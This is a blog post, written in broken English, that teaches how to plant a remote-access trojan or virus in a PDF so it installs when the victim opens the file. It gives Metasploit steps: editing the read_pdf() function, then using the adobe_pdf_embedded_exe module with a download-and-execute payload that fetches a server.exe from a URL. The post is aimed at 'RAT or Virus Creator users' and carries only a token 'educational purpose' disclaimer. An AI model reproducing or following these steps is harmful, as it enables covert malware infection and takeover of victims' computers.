PDF Backdoor tutorial



Now i will teach you how to created a backdook on PDF's. This is Old but golds this tutorials best for the RAT or Virus Creator user's.

 SHORT EXPLAINATIONS:
--> Whin the victims open the the pdf files. Automatically install the RAT or Virus that you plant on the pdf files.

 NOTE:
--> DO IT AT YOUR OWN RISK. THIS TUTORIALS FOR EDUCATIONAL PURPOSE ONLY.

 REQUIREMENTA:
ʉۢ Metasploit or Download hete: http://www.rapid7.com/products/metasploit/download.jsp )

ʉۢ PDF Ebooks - That virus undectable / or anything pdf files that 100% virus undectable [Im not provide this pdf files undetectable for you. :) 'find your own files']


NOW LET'S START:
1) Open the Metasploit Directory Folder. Thin go to: "C:\metasploit\apps\pro\msf3\lib\msf\core\exploit\pdf_parse.rb" Now open to any text editor like 'notepad'

2) Now change the "read_pdf()" function to:
def read_pdf()
#stream = IO.read("#{datastore
['INFILENAME']}")
stream = open("#{datastore['INFILENAME']}",
"rb") {|io| io.read }
return stream
end

3) Reboot your PC.

4) Note. if use this exploit make sure the pdf files is old like on the directory of the "C:/metasploit/apps/pro/ui/public/docs/Phishing_QuickStartGuide.pdf"



LET'S START TO INFECT:

1) Open metasploit console

2) Now type to console: use exploit/windows/fileformat/adobe_pdf_embedded_exe

3) Thin type to console: set payload windows/download_exec

4) Type to console: set INFILENAMEExample: set INFILENAME C:/Users/Owner/Desktop/example.pdf

5) Type to console: set url EXAMPLE: set url http://download.com/server.exe


EXPLOIT IS DONE.... NOW YOU HAVE SUCCESSFULL TO PLANT YOU RAT OR VIRUS..

No comments

Powered by Blogger.